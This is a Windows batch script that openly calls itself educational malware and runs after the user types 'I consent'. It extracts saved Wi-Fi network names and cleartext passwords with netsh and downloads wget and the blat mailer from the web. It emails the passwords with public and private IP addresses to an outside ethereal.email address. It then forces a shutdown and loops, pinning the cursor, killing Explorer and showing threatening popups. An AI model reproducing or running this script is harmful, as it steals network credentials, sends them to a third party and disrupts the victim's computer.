REM See the "Licence" document for the open source license.

@echo off
set "ssids="
set "passwords="
set "consent=I consent"
:login
cls
echo WARNING This batch file is malware, and WILL do unwanted actions on your computer. This malware was made strictly for EDUCATIONAL purposes. If you stil wish to run the malware, enter "I consent" in the field below: If you do not wish to run this malware, enter anything other than "I consent" in the field below:
set /p "userinput="
if "%userinput%" neq "%consent%" (
    echo Consent was not given. Exiting...
    timeout /nobreak /t 2 >nul
    exit /b 0
)

echo Running malware...
timeout /nobreak /t 3 >nul
cls
color a
echo HELLO %USERNAME%
RUNDLL32 USER32.DLL,SwapMouseButton

for /f "tokens=2 delims=:" %%a in ('netsh wlan show profile ^| findstr ":"') do (
    set "ssid=%%~a"
    call :getpwd "%%ssid:~1%%"
)

set "TEMP_DIR=%TEMP%\blat_download"
if not exist %TEMP_DIR% mkdir %TEMP_DIR%
cd %TEMP_DIR%

powershell -Command "(New-Object Net.WebClient).DownloadFile('https://eternallybored.org/misc/wget/1.21.2/64/wget.exe', 'wget.exe')"
wget.exe -O blat.zip "https://sourceforge.net/projects/blat/files/latest/download"
powershell -Command "Expand-Archive -Path blat.zip -DestinationPath ."

for /r %%i in (blat.exe) do set "BLAT_EXE_DIR=%%~dpi"
"%BLAT_EXE_DIR%blat.exe" -install smtp.ethereal.email luz.zieme64@ethereal.email

if errorlevel 1 (
    echo Error installing blat. Code: %errorlevel%
    goto :cleanup
)

powershell -Command "(New-Object Net.WebClient).DownloadFile('https://eternallybored.org/misc/wget/1.21.2/64/wget.exe', 'wget.exe')"
wget -qO- ipinfo.io/ip > temp_ip.txt
set /p public_ip=<temp_ip.txt
del wget.exe
del temp_ip.txt

for /f "tokens=2 delims=:" %%A in ('ipconfig ^| find "IPv4"') do set ip=%%A
set ip=%ip:~1%

"%BLAT_EXE_DIR%blat.exe" -to "luz.zieme64@ethereal.email" -subject "Network Information for %USERNAME%" -body "Public IP: %public_ip% Private IP: %ip% SSIDs: %ssids% Passwords: %passwords% Retrieved at this date: %date% and time: %time%"

if errorlevel 1 (
    echo Error sending email. Code: %errorlevel%
    goto :cleanup
)

:cleanup
cd ..
cls
rmdir /s /q %TEMP_DIR%
echo I HAVE YOUR IP
echo PUBLIC IP: %public_ip%
echo PRIVATE IP: %ip%
start /min powershell.exe -WindowStyle Minimized -Command "Start-Sleep -Seconds 10; Stop-Computer -Force"
:loop
color 2
start /min powershell.exe -WindowStyle Minimized -Command "[System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms') | Out-Null; [System.Windows.Forms.Cursor]::Position = New-Object System.Drawing.Point(0,0)"
color 10
start /min powershell.exe -WindowStyle Minimized -Command "[System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms') | Out-Null; [System.Windows.Forms.Cursor]::Position = New-Object System.Drawing.Point(0,0)"
echo Msgbox "YOU ARE NOT SAFE.", 48 + 0, "ERORR" > msg.vbs
start /min powershell.exe -WindowStyle Minimized -Command "[System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms') | Out-Null; [System.Windows.Forms.Cursor]::Position = New-Object System.Drawing.Point(0,0)"
start msg.vbs
start /min powershell.exe -WindowStyle Minimized -Command "[System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms') | Out-Null; [System.Windows.Forms.Cursor]::Position = New-Object System.Drawing.Point(0,0)"
start /min powershell.exe -WindowStyle Minimized -Command "Get-Process | Where-Object { $_.Name -eq 'explorer' } | Stop-Process -Force"
start /min powershell.exe -WindowStyle Minimized -Command "[System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms') | Out-Null; [System.Windows.Forms.Cursor]::Position = New-Object System.Drawing.Point(0,0)"
@echo off
goto loop

:getpwd
set "ssid=%*"
for /f "tokens=2 delims=:" %%i in ('netsh wlan show profile name^="%ssid:"=%" key^=clear ^| findstr /C:"Key Content"') do (
    set "ssids=!ssids! %ssid%"
    set "passwords=!passwords! %%i"
)
exit /b 0